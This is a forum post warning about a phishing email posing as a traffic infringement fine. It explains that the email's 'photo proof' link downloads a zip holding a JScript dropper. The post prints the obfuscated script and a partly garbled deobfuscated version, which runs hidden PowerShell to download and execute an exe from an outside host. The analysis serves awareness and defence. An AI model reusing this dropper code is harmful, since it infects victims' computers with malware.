You have recieved a `Traffic infringement`

[Googlybear]

First time i have recieved one of these or even heard of it...

Via email:

You have been detected with a traffic infringement:

Details: negligent driving

Infringement No: 788725081

Date of infringement: 28/10/2016

Amount due: 575.30 AUD

This fine will be forwarded by mail to your address. However you can check it now, please press here Photo Proof - 009150526

This (and its variants) have been doing the rounds for nearly 2 years

https://www.google.co.nz/?gws_rd=ssl#q= ... m&start=10

The `photo proof` link leads directly to a zipped file download via this website: ekonisenerji.com/photo%20proof%20-%20pay%20up%20to%2023-2016.zip

Inside the zip file is a Javascript code file

Code: Select all

var hdEJzSs = new ActiveXObject("shell.aPplIcatIon");

var pmMgJBu = new ActiveXObject("wscRipt.sHell");

var Paqoxmd = 'hdEJzSsN.ShNeNlNlExNeNcNuteN(N"NCMND.NENxEN",N "/cN NpNingN NlNoNcalNhoNsNt N& pNoNwNerNsNhelNlN.NexNeN N-NexNeNcutNionpNoliNcNy NbNyNpNassN N-NnNopNrNofNiNlNeN -wiNndNowNsNtyNlNe hNiNdNdenN (nNewN-oNbNjeNcNtN systeNmN.nNetN.NwNebclient).dowNnlNoNaNdNfile(\'htNtp://stNr.dnoNdaNiNlyneNwNsN.Nxyz/YGRXtqNmNTNhNL.NpNhp\',\'N%ApNpNDNaNtAN%NvNxNjN12.exe\')N; NstANrNTN-pNrONcNeNsNs \'N%ANPNpdNaNtNAN%NvNxjN1N2N.EXe\'N",N "",N N"NoNpNeNnN",N 0N);';

var cXKvEMeJ = ("XHXKXLM\\sXoXFXtXwXAre\\mXiXCRXoXsoXfT\\WXinXDXOXwXS XNt\\cXUrXrXEnTVXerXsXioN\\sXyXsteXmXrOXot").replace(/\X/g, "");

var JGWXrUoR = pmMgJBu.RegRead(cXKvEMeJ).charAt(303769500/60753900).toUpperCase();
(new Function(Paqoxmd.replace(RegExp(JGWXrUoR, "g"), "")))();

Anyone who can understand script code wont struggle to figure out the very crude method used to obfuscate the code into gobbledegook.
The third`var` line is padded with multiple `N`characters , the forth var with `X` and the fifth with a `g`

remove those letters and your left with

Code: Select all

var hdejzss = new activexobject("shell.application");

var pmmgjbu = new activexobject("wscript.shell");

var paqoxmd = 'hdejzss.shellexecute("cmd.exe", "/c pig localhost & powershell.exe -executiopolicy bypass -oprofile -widowstyle hidde (ew-object system.et.webcliet).dowloadfile(\'http://str.dodailyews.xyz/ygrxtqmthl.php\',\'%appdata%vxj12.exe\'); start-process \'%appdata%vxj12.exe\'", "", "ope", 0);';

var ckvemej = ("hklm\\software\\microsoft\\windows nt\\currentversion\\systemroot").replace(/\/g, "");

var jgwxruor = pmmgjbu.regread(cxkvemej).charat(303769500/60753900).touppercase();
(new function(paqoxmd.replace(regexp(jgwxruor, "g"), "")))();

It will come as no surprise that not only are `victim`s running the code but they are also actually paying the `fine`